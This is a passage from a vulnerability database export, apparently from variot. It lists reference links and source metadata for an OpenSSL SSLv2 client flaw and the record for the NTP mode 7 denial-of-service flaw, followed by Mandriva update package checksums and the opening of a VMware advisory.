          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22626"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22212"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/23309"
          },
          {
            "trust": 1.0,
            "url": "http://lists.apple.com/archives/security-announce/2006/nov/msg00001.html"
          },
          {
            "trust": 1.0,
            "url": "http://openvpn.net/changelog.html"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2007/2783"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22460"
          },
          {
            "trust": 1.0,
            "url": "http://www.securityfocus.com/archive/1/470460/100/0/threaded"
          },
          {
            "trust": 1.0,
            "url": "http://www.securityfocus.com/bid/20249"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22487"
          },
          {
            "trust": 1.0,
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/29237"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22240"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22772"
          },
          {
            "trust": 1.0,
            "url": "http://itrc.hp.com/service/cki/docdisplay.do?docid=c00805100"
          },
          {
            "trust": 1.0,
            "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a9370"
          },
          {
            "trust": 1.0,
            "url": "http://lists.grok.org.uk/pipermail/full-disclosure/2006-september/049715.html"
          },
          {
            "trust": 1.0,
            "url": "http://www.mandriva.com/security/advisories?name=mdksa-2006:178"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/24950"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2006/4314"
          },
          {
            "trust": 1.0,
            "url": "http://www.debian.org/security/2006/dsa-1195"
          },
          {
            "trust": 1.0,
            "url": "http://www.securityfocus.com/archive/1/447393/100/0/threaded"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/23915"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/25889"
          },
          {
            "trust": 1.0,
            "url": "ftp://patches.sgi.com/support/free/security/advisories/20061001-01-p.asc"
          },
          {
            "trust": 1.0,
            "url": "http://www.xerox.com/downloads/usa/en/c/cert_essnetwork_xrx07001_v1.pdf"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22298"
          },
          {
            "trust": 1.0,
            "url": "http://www.vmware.com/support/esx21/doc/esx-213-200612-patch.html"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/23155"
          },
          {
            "trust": 1.0,
            "url": "http://www.redhat.com/support/errata/rhsa-2006-0695.html"
          },
          {
            "trust": 1.0,
            "url": "http://support.avaya.com/elmodocs2/security/asa-2006-220.htm"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2006/4036"
          },
          {
            "trust": 1.0,
            "url": "http://www.serv-u.com/releasenotes/"
          },
          {
            "trust": 1.0,
            "url": "ftp://ftp.netbsd.org/pub/netbsd/security/advisories/netbsd-sa2008-007.txt.asc"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22165"
          },
          {
            "trust": 1.0,
            "url": "http://securitytracker.com/id?1016943"
          },
          {
            "trust": 1.0,
            "url": "http://www.securityfocus.com/archive/1/456546/100/200/threaded"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22259"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/23038"
          },
          {
            "trust": 1.0,
            "url": "http://www.novell.com/linux/security/advisories/2006_24_sr.html"
          },
          {
            "trust": 1.0,
            "url": "http://sunsolve.sun.com/search/document.do?assetkey=1-26-102711-1"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2007/2315"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2006/3820"
          },
          {
            "trust": 1.0,
            "url": "http://sourceforge.net/project/shownotes.php?release_id=461863\u0026group_id=69227"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2007/1401"
          },
          {
            "trust": 1.0,
            "url": "http://docs.info.apple.com/article.html?artnum=304829"
          },
          {
            "trust": 1.0,
            "url": "http://www.trustix.org/errata/2006/0054"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/23280"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22130"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22166"
          },
          {
            "trust": 1.0,
            "url": "http://sunsolve.sun.com/search/document.do?assetkey=1-66-201531-1"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2007/0343"
          },
          {
            "trust": 1.0,
            "url": "http://www.ubuntu.com/usn/usn-353-1"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/23794"
          },
          {
            "trust": 1.0,
            "url": "http://h20000.www2.hp.com/bizsupport/techsupport/document.jsp?objectid=c01118771"
          },
          {
            "trust": 1.0,
            "url": "http://security.freebsd.org/advisories/freebsd-sa-06:23.openssl.asc"
          },
          {
            "trust": 1.0,
            "url": "http://www.openpkg.org/security/advisories/openpkg-sa-2006.021-openssl.html"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2006/4443"
          },
          {
            "trust": 1.0,
            "url": "http://www.osvdb.org/29262"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/31492"
          },
          {
            "trust": 1.0,
            "url": "http://www.vmware.com/support/esx2/doc/esx-202-200612-patch.html"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2006/3902"
          },
          {
            "trust": 1.0,
            "url": "http://www.cisco.com/en/us/products/hw/contnetw/ps4162/tsd_products_security_response09186a008077af1b.html"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22260"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22284"
          },
          {
            "trust": 1.0,
            "url": "http://www.novell.com/linux/security/advisories/2006_58_openssl.html"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22500"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2006/3869"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22186"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/30124"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/30161"
          },
          {
            "trust": 1.0,
            "url": "http://www.gentoo.org/security/en/glsa/glsa-200612-11.xml"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22544"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/23680"
          },
          {
            "trust": 1.0,
            "url": "http://www.gentoo.org/security/en/glsa/glsa-200805-07.xml"
          },
          {
            "trust": 1.0,
            "url": "http://security.gentoo.org/glsa/glsa-200610-11.xml"
          },
          {
            "trust": 1.0,
            "url": "http://itrc.hp.com/service/cki/docdisplay.do?docid=c00849540"
          },
          {
            "trust": 1.0,
            "url": "https://www2.itrc.hp.com/service/cki/docdisplay.do?docid=c00967144"
          },
          {
            "trust": 1.0,
            "url": "http://www130.nortelnetworks.com/go/main.jsp?cscat=bltndetail\u0026documentoid=498093\u0026renditionid=\u0026poid=8881"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2006/3936"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2006/4750"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22791"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22758"
          },
          {
            "trust": 1.0,
            "url": "http://www.vmware.com/support/vi3/doc/esx-3069097-patch.html"
          },
          {
            "trust": 1.0,
            "url": "http://openbsd.org/errata.html#openssl2"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2006/4264"
          },
          {
            "trust": 1.0,
            "url": "http://www.vmware.com/support/vi3/doc/esx-9986131-patch.html"
          },
          {
            "trust": 1.0,
            "url": "http://www.us-cert.gov/cas/techalerts/ta06-333a.html"
          },
          {
            "trust": 1.0,
            "url": "http://www.vmware.com/support/esx25/doc/esx-253-200612-patch.html"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/24930"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/23340"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22207"
          },
          {
            "trust": 1.0,
            "url": "http://www.mandriva.com/security/advisories?name=mdksa-2006:177"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2006/4417"
          },
          {
            "trust": 0.8,
            "url": "http://jvn.jp/cert/jvnvu%23386964/index.html"
          },
          {
            "trust": 0.8,
            "url": "http://www.securityfocus.com/bid/20246"
          },
          {
            "trust": 0.8,
            "url": "http://www.imc.org/ietf-openpgp/mail-archive/msg14307.html"
          },
          {
            "trust": 0.8,
            "url": "http://www.matasano.com/log/469/many-rsa-signatures-may-be-forgeable-in-openssl-and-elsewhere/"
          },
          {
            "trust": 0.8,
            "url": "http://www.openssl.org/news/secadv_20060905.txt "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/21709/"
          },
          {
            "trust": 0.8,
            "url": "http://www.rsasecurity.com/rsalabs/node.asp?id=2125"
          },
          {
            "trust": 0.8,
            "url": "http://www.ietf.org/rfc/rfc3447.txt"
          },
          {
            "trust": 0.8,
            "url": "http://jvn.jp/cert/jvnvu%23547300/index.html"
          },
          {
            "trust": 0.8,
            "url": "http://lists.grok.org.uk/pipermail/full-disclosure/2006-september/049715.html "
          },
          {
            "trust": 0.8,
            "url": "https://issues.rpath.com/browse/rpl-613 "
          },
          {
            "trust": 0.8,
            "url": "http://www.openssl.org/news/secadv_20060928.txt "
          },
          {
            "trust": 0.8,
            "url": "http://kolab.org/security/kolab-vendor-notice-11.txt "
          },
          {
            "trust": 0.8,
            "url": "http://openvpn.net/changelog.html "
          },
          {
            "trust": 0.8,
            "url": "http://www.serv-u.com/releasenotes/ "
          },
          {
            "trust": 0.8,
            "url": "http://openbsd.org/errata.html#openssl2 "
          },
          {
            "trust": 0.8,
            "url": "http://www.securityfocus.com/bid/20249 "
          },
          {
            "trust": 0.8,
            "url": "http://securitytracker.com/id?1016943 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22130 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22094 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22165 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22186 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22193 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22207 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22259 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22260 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22166 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22172 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22212 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22240 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22216 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22116 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22220 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22284 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22330 "
          },
          {
            "trust": 0.8,
            "url": "http://xforce.iss.net/xforce/xfdb/29237 "
          },
          {
            "trust": 0.3,
            "url": "http://www.cisco.com/warp/public/707/cisco-air-20061108-openssl.shtml"
          },
          {
            "trust": 0.3,
            "url": "http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2007.html"
          },
          {
            "trust": 0.3,
            "url": "http://www.itefix.no/phpws/index.php?module=announce\u0026ann_user_op=view\u0026ann_id=80"
          },
          {
            "trust": 0.3,
            "url": "http://h20000.www2.hp.com/bizsupport/techsupport/document.jsp?lang=en\u0026cc=us\u0026objectid=c00967144"
          },
          {
            "trust": 0.3,
            "url": "http://www1.itrc.hp.com/service/cki/docdisplay.do?admit=-682735245+1165342903618+28353475\u0026docid=c00805100"
          },
          {
            "trust": 0.3,
            "url": "http://www14.software.ibm.com/webapp/set2/sas/f/hmc/home.html"
          },
          {
            "trust": 0.3,
            "url": "http://www.ipcop.org/modules.php?op=modload\u0026name=news\u0026file=article\u0026sid=31\u0026mode=thread\u0026order=0\u0026thold=0"
          },
          {
            "trust": 0.3,
            "url": "http://www.ingate.com/relnote-452.php"
          },
          {
            "trust": 0.3,
            "url": "http://www.cyberguard.info/snapgear/releases.html"
          },
          {
            "trust": 0.3,
            "url": "http://www.stonesoft.com/en/support/security_advisories/2909_2006.html"
          },
          {
            "trust": 0.3,
            "url": "http://sunsolve.sun.com/search/document.do?assetkey=1-26-102711-1\u0026searchclause="
          },
          {
            "trust": 0.3,
            "url": "/archive/1/481217"
          },
          {
            "trust": 0.3,
            "url": "https://www.itrc.hp.com/service/cki/docdisplay.do?docid=emr_na-c02475053"
          },
          {
            "trust": 0.3,
            "url": "http://rhn.redhat.com/errata/rhsa-2008-0264.html"
          },
          {
            "trust": 0.3,
            "url": "http://rhn.redhat.com/errata/rhsa-2008-0525.html"
          },
          {
            "trust": 0.3,
            "url": "http://rhn.redhat.com/errata/rhsa-2008-0629.html"
          },
          {
            "trust": 0.3,
            "url": "http://sunsolve.sun.com/search/document.do?assetkey=1-26-102668-1\u0026searchclause="
          },
          {
            "trust": 0.3,
            "url": "http://www116.nortelnetworks.com/pub/repository/clarify/document/2006/44/021420-01.pdf"
          },
          {
            "trust": 0.3,
            "url": "http://a1851.g.akamaitech.net/f/1851/2996/24h/cacheb.xerox.com/downloads/usa/en/c/cert_essnetwork_xrx07001_v1.pdf"
          },
          {
            "trust": 0.2,
            "url": "http://secunia.com/"
          },
          {
            "trust": 0.2,
            "url": "http://lists.grok.org.uk/full-disclosure-charter.html"
          },
          {
            "trust": 0.2,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-3738"
          },
          {
            "trust": 0.1,
            "url": "http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-2940"
          },
          {
            "trust": 0.1,
            "url": "http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-3738"
          },
          {
            "trust": 0.1,
            "url": "http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-2937"
          },
          {
            "trust": 0.1,
            "url": "http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-4343"
          },
          {
            "trust": 0.1,
            "url": "http://www.mandriva.com/security/"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-4343"
          },
          {
            "trust": 0.1,
            "url": "https://www.niscc.gov.uk)."
          },
          {
            "trust": 0.1,
            "url": "http://www.mandriva.com/security/advisories"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-2940"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-2937"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-5135"
          },
          {
            "trust": 0.1,
            "url": "http://security.freebsd.org/patches/sa-07:08/openssl.patch.asc"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2007-3738"
          },
          {
            "trust": 0.1,
            "url": "http://security.freebsd.org/\u003e."
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2007-5135"
          },
          {
            "trust": 0.1,
            "url": "http://security.freebsd.org/advisories/freebsd-sa-07:08.openssl.asc"
          },
          {
            "trust": 0.1,
            "url": "http://security.freebsd.org/patches/sa-07:08/openssl.patch"
          },
          {
            "trust": 0.1,
            "url": "http://marc.info/?l=bugtraq\u0026m=119091888624735"
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#386964"
          },
          {
            "db": "CERT/CC",
            "id": "VU#845620"
          },
          {
            "db": "CERT/CC",
            "id": "VU#547300"
          },
          {
            "db": "BID",
            "id": "20249"
          },
          {
            "db": "PACKETSTORM",
            "id": "50595"
          },
          {
            "db": "PACKETSTORM",
            "id": "50543"
          },
          {
            "db": "PACKETSTORM",
            "id": "59797"
          },
          {
            "db": "NVD",
            "id": "CVE-2006-3738"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CERT/CC",
            "id": "VU#386964"
          },
          {
            "db": "CERT/CC",
            "id": "VU#845620"
          },
          {
            "db": "CERT/CC",
            "id": "VU#547300"
          },
          {
            "db": "BID",
            "id": "20249"
          },
          {
            "db": "PACKETSTORM",
            "id": "50595"
          },
          {
            "db": "PACKETSTORM",
            "id": "50543"
          },
          {
            "db": "PACKETSTORM",
            "id": "59797"
          },
          {
            "db": "NVD",
            "id": "CVE-2006-3738"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2006-09-28T00:00:00",
            "db": "CERT/CC",
            "id": "VU#386964"
          },
          {
            "date": "2006-09-11T00:00:00",
            "db": "CERT/CC",
            "id": "VU#845620"
          },
          {
            "date": "2006-09-28T00:00:00",
            "db": "CERT/CC",
            "id": "VU#547300"
          },
          {
            "date": "2006-09-28T00:00:00",
            "db": "BID",
            "id": "20249"
          },
          {
            "date": "2006-10-04T20:17:01",
            "db": "PACKETSTORM",
            "id": "50595"
          },
          {
            "date": "2006-10-04T00:47:19",
            "db": "PACKETSTORM",
            "id": "50543"
          },
          {
            "date": "2007-10-05T05:29:31",
            "db": "PACKETSTORM",
            "id": "59797"
          },
          {
            "date": "2006-09-28T18:07:00",
            "db": "NVD",
            "id": "CVE-2006-3738"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2011-07-22T00:00:00",
            "db": "CERT/CC",
            "id": "VU#386964"
          },
          {
            "date": "2007-02-08T00:00:00",
            "db": "CERT/CC",
            "id": "VU#845620"
          },
          {
            "date": "2011-07-22T00:00:00",
            "db": "CERT/CC",
            "id": "VU#547300"
          },
          {
            "date": "2011-05-09T19:52:00",
            "db": "BID",
            "id": "20249"
          },
          {
            "date": "2025-04-09T00:30:58.490000",
            "db": "NVD",
            "id": "CVE-2006-3738"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "network",
        "sources": [
          {
            "db": "BID",
            "id": "20249"
          }
        ],
        "trust": 0.3
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "OpenSSL SSLv2 client code fails to properly check for NULL",
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#386964"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Boundary Condition Error",
        "sources": [
          {
            "db": "BID",
            "id": "20249"
          }
        ],
        "trust": 0.3
      }
    }

    VAR-200912-0769

    Vulnerability from variot - Updated: 2026-03-07 20:12

    ntp_request.c in ntpd in NTP before 4.2.4p8, and 4.2.5, allows remote attackers to cause a denial of service (CPU and bandwidth consumption) by using MODE_PRIVATE to send a spoofed (1) request or (2) response packet that triggers a continuous exchange of MODE_PRIVATE error responses between two NTP daemons. A novel traffic-loop vulnerability has been identified against certain implementations of UDP-based applications protocols. An unauthenticated attacker can use maliciously-crafted packets against a UDP-based vulnerable implementation of application protocols (e.g., DNS, NTP, TFTP) that can lead to Denial-of-Service (DOS) and/or abuse of resources.CVE-2009-3563 Unknown CVE-2024-1309 Unknown CVE-2024-2169 AffectedCVE-2009-3563 Unknown CVE-2024-1309 Unknown CVE-2024-2169 Affected. NTP for, mode 7 A vulnerability exists due to packet processing. NTP Then "restrict ... noquery" or "restrict ... ignore" There are no restrictions due to the settings of IP From the address, an invalid mode 7 request or mode 7 If you receive an error response, mode 7 Returns and logs the error message. NTP The sender address was spoofed. mode 7 A vulnerability exists due to packet processing.Service operation obstruction by a remote third party (DoS) You may be attacked. NTP is prone to a remote denial-of-service vulnerability because it fails to properly handle certain incoming network packets. An attacker can exploit this issue to cause the application to consume excessive CPU resources and fill disk space with log messages.


    References:

    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3563


    Updated Packages:

    Mandriva Linux 2008.0: 7377623e9f89c5f6f6cc7af577974458 2008.0/i586/ntp-4.2.4-10.3mdv2008.0.i586.rpm 977fdaf289c9eff53fb6d563b8a60ede 2008.0/i586/ntp-client-4.2.4-10.3mdv2008.0.i586.rpm e2701dc192a578b141f9408d355522b6 2008.0/i586/ntp-doc-4.2.4-10.3mdv2008.0.i586.rpm 167e3a9dbf1bd10fd576e6a91a2cbc10 2008.0/SRPMS/ntp-4.2.4-10.3mdv2008.0.src.rpm

    Mandriva Linux 2008.0/X86_64: 4fa28ef04548ded3dc604ea61a671cc5 2008.0/x86_64/ntp-4.2.4-10.3mdv2008.0.x86_64.rpm b79353be7c2da1fadf3bc55c2c06a6a6 2008.0/x86_64/ntp-client-4.2.4-10.3mdv2008.0.x86_64.rpm c93dd45fc32ece044874c09aac85ce66 2008.0/x86_64/ntp-doc-4.2.4-10.3mdv2008.0.x86_64.rpm 167e3a9dbf1bd10fd576e6a91a2cbc10 2008.0/SRPMS/ntp-4.2.4-10.3mdv2008.0.src.rpm

    Mandriva Linux 2009.0: 6a38837b845970b62520f48273362485 2009.0/i586/ntp-4.2.4-18.5mdv2009.0.i586.rpm 4f9d98a186c4ca4348f8296fde0bf174 2009.0/i586/ntp-client-4.2.4-18.5mdv2009.0.i586.rpm 0ae26de5f1bddba4c2718a55463d94b7 2009.0/i586/ntp-doc-4.2.4-18.5mdv2009.0.i586.rpm 45b55bdbde84289b20e295b9dbf188fb 2009.0/SRPMS/ntp-4.2.4-18.5mdv2009.0.src.rpm

    Mandriva Linux 2009.0/X86_64: e31f3f71e730e5777d9832cd76430b17 2009.0/x86_64/ntp-4.2.4-18.5mdv2009.0.x86_64.rpm 67a998da616d287fe9e15092bbd45ff6 2009.0/x86_64/ntp-client-4.2.4-18.5mdv2009.0.x86_64.rpm ab02dd7a3457f0ba75248390827c69a4 2009.0/x86_64/ntp-doc-4.2.4-18.5mdv2009.0.x86_64.rpm 45b55bdbde84289b20e295b9dbf188fb 2009.0/SRPMS/ntp-4.2.4-18.5mdv2009.0.src.rpm

    Mandriva Linux 2009.1: b6597f0ee96ec99c7ddbe5e18a588e48 2009.1/i586/ntp-4.2.4-22.3mdv2009.1.i586.rpm 069667f851886c39daa0309a5e920619 2009.1/i586/ntp-client-4.2.4-22.3mdv2009.1.i586.rpm 9d5b87f008f00ad30b3c652e5f62eea2 2009.1/i586/ntp-doc-4.2.4-22.3mdv2009.1.i586.rpm e2686dd1237f529bb08f2837052fb46f 2009.1/SRPMS/ntp-4.2.4-22.3mdv2009.1.src.rpm

    Mandriva Linux 2009.1/X86_64: e88121b38c942c572b61ba7631130104 2009.1/x86_64/ntp-4.2.4-22.3mdv2009.1.x86_64.rpm c10eaf7ecbeb3b5db5eac978cb2ae78e 2009.1/x86_64/ntp-client-4.2.4-22.3mdv2009.1.x86_64.rpm 8ff34e79ed1f88fa2e7b7e8030232a30 2009.1/x86_64/ntp-doc-4.2.4-22.3mdv2009.1.x86_64.rpm e2686dd1237f529bb08f2837052fb46f 2009.1/SRPMS/ntp-4.2.4-22.3mdv2009.1.src.rpm

    Mandriva Linux 2010.0: 2913258a9be65654a3ce5e16c1bd5b25 2010.0/i586/ntp-4.2.4-27.1mdv2010.0.i586.rpm 90cf8d7f8fb468461f8b8baf7d97daa4 2010.0/i586/ntp-client-4.2.4-27.1mdv2010.0.i586.rpm 0b8527559ef05049461cea2f5a83bd6d 2010.0/i586/ntp-doc-4.2.4-27.1mdv2010.0.i586.rpm 7bbd4271086ace434dd8a958bc7c2488 2010.0/SRPMS/ntp-4.2.4-27.1mdv2010.0.src.rpm

    Mandriva Linux 2010.0/X86_64: 2e938e58d48f3f581ffaab085dacc1f2 2010.0/x86_64/ntp-4.2.4-27.1mdv2010.0.x86_64.rpm cde3421867c549169751f2964420a578 2010.0/x86_64/ntp-client-4.2.4-27.1mdv2010.0.x86_64.rpm d9799e7286a49420699d3995e8bc1e47 2010.0/x86_64/ntp-doc-4.2.4-27.1mdv2010.0.x86_64.rpm 7bbd4271086ace434dd8a958bc7c2488 2010.0/SRPMS/ntp-4.2.4-27.1mdv2010.0.src.rpm

    Corporate 3.0: 65dda36544e7a43175abfd64aa725b34 corporate/3.0/i586/ntp-4.2.0-2.4.C30mdk.i586.rpm a485cad0631598335af0e89ea399ff9d corporate/3.0/SRPMS/ntp-4.2.0-2.4.C30mdk.src.rpm

    Corporate 3.0/X86_64: 44130a38552f20b3f34d176c47aa5aab corporate/3.0/x86_64/ntp-4.2.0-2.4.C30mdk.x86_64.rpm a485cad0631598335af0e89ea399ff9d corporate/3.0/SRPMS/ntp-4.2.0-2.4.C30mdk.src.rpm

    Corporate 4.0: a2f5a598865d390f7c537fc9e1a9a758 corporate/4.0/i586/ntp-4.2.0-21.7.20060mlcs4.i586.rpm f7eb3884bc0aa71f8237d9500d24489e corporate/4.0/i586/ntp-client-4.2.0-21.7.20060mlcs4.i586.rpm d2ed46d981570f66763f85c822b14179 corporate/4.0/SRPMS/ntp-4.2.0-21.7.20060mlcs4.src.rpm

    Corporate 4.0/X86_64: 1bd4395c9c80b583bad4ce5085c0d557 corporate/4.0/x86_64/ntp-4.2.0-21.7.20060mlcs4.x86_64.rpm 95f812f672cf79fccee411154c23d6ee corporate/4.0/x86_64/ntp-client-4.2.0-21.7.20060mlcs4.x86_64.rpm d2ed46d981570f66763f85c822b14179 corporate/4.0/SRPMS/ntp-4.2.0-21.7.20060mlcs4.src.rpm

    Mandriva Enterprise Server 5: 16e3975f3e4bb9a830eb1e8166f2fec7 mes5/i586/ntp-4.2.4-18.5mdvmes5.i586.rpm 2af9623d6f3685d54dd4db31f9622f7a mes5/i586/ntp-client-4.2.4-18.5mdvmes5.i586.rpm 5abb771d456b4094d123c5cf24701aee mes5/i586/ntp-doc-4.2.4-18.5mdvmes5.i586.rpm 086a05988392a6602c023f4e453bcc32 mes5/SRPMS/ntp-4.2.4-18.5mdvmes5.src.rpm

    Mandriva Enterprise Server 5/X86_64: 9b40b186bf9ebeb70c1350f9a158ac92 mes5/x86_64/ntp-4.2.4-18.5mdvmes5.x86_64.rpm f4a42229dc9b408b04f0c83aa3a25720 mes5/x86_64/ntp-client-4.2.4-18.5mdvmes5.x86_64.rpm 2022447e5d9dbf6ee1a6e594935b1d04 mes5/x86_64/ntp-doc-4.2.4-18.5mdvmes5.x86_64.rpm 086a05988392a6602c023f4e453bcc32 mes5/SRPMS/ntp-4.2.4-18.5mdvmes5.src.rpm

    Multi Network Firewall 2.0: 56a2596fd513295f0700508c08a6a3da mnf/2.0/i586/ntp-4.2.0-2.4.C30mdk.i586.rpm f8218643f02c3168e0331852630835a0 mnf/2.0/SRPMS/ntp-4.2.0-2.4.C30mdk.src.rpm


    To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.

    All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:

    gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

    You can view other update advisories for Mandriva Linux at:

    http://www.mandriva.com/security/advisories

    If you want to report vulnerabilities, please contact

    security_(at)_mandriva.com


    Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux)

    iD8DBQFLHtsAmqjQ0CJFipgRAi1pAKDUH87qI312n3XHGnl4TgVNC+IuvACbBhUw nLO5FqSyfvZaqSNZ93vTSUw= =XCg1 -----END PGP SIGNATURE----- . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1


                   VMware Security Advisory
    

    Advisory ID: VMSA-2010-0004 Synopsis: ESX Service Console and vMA third party updates Issue date: 2010-03-03 Updated on: 2010-03-03 (initial release of advisory) CVE numbers: CVE-2009-2905 CVE-2008-4552 CVE-2008-4316 CVE-2009-1377 CVE-2009-1378 CVE-2009-1379 CVE-2009-1386 CVE-2009-1387 CVE-2009-0590 CVE-2009-4022 CVE-2009-3560 CVE-2009-3720 CVE-2009-2904 CVE-2009-3563 CVE-2009-2695 CVE-2009-2849 CVE-2009-2695 CVE-2009-2908 CVE-2009-3228 CVE-2009-3286 CVE-2009-3547 CVE-2009-3613 CVE-2009-3612 CVE-2009-3620 CVE-2009-3621 CVE-2009-3726 CVE-2008-3916 CVE-2009-1189 CVE-2009-0115


    1. Summary

    ESX Service Console updates for newt, nfs-utils, and glib2 packages.

